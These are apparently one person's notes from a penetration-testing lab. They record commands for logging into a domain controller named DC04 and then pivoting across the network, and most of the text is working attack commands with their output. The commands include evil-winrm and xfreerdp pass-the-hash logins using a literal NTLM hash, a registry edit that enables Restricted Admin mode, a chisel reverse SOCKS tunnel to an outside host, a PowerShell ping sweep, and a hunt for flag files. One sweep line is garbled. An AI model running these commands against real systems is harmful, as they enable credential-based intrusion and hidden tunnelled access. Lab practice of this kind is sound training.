DC04 Login

 
proxychains -f proxychains4.conf evil-winrm -i 172.16.4.5 -u 'Administrator' -H a569f80ccd9fda0ea5e749d20aa80657 /domain:client.offshore.com
 
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
 
proxychains -f proxychains4.conf xfreerdp /u:Administrator /pth:a569f80ccd9fda0ea5e749d20aa80657 /v:172.16.4.5
 
.\chiselj.exe client 10.10.15.149:8004 R:7000:socks
 

Ping Sweep

 
 �1�.�.�2�56� �|� �%� �{�"�1�7�2�.�1�6�.�4�.�$�(�$�_�)�:� �$�(�T�e�s�t�-�C�o�n�n�e�c�t�i�o�n� �-�c�o�u�n�t� �1� �-�c�o�m�p� �1�7�2�.�1�6�.�4.�$�(�$�_�)� �-�q�u�i�e�t�)�"�}���

1..256 | % {"192.168.210.$($_): $(Test-Connection -count 1 -comp 192.168.210.$($_) -quiet)"}

New IP

172.16.4.120 — Linux ping 64 172.16.2.12 — Windows ping 126 172.16.1.22 —Linux ping 64

machines Name

NIX02 Linux DEV-MGMT01 Windows CLIENT-NIX03 Linux

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path $_.Root -Filter user.txt -Recurse -ErrorAction SilentlyContinue
}
 

 
 
 
    Directory: C:\Users\Administrator\Desktop
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/28/2018   6:22 PM             37 flag.txt
 
 
    Directory: C:\Windows\SYSVOL\domain\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/28/2018   5:54 PM             27 flag.txt
 
 
    Directory: C:\Windows\SYSVOL\sysvol\CLIENT.OFFSHORE.COM\Policies\{ABBDB649-E74D-4DDB-A6B3-9C1055BE903C}\Machine
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/28/2018   5:54 PM             27 flag.txt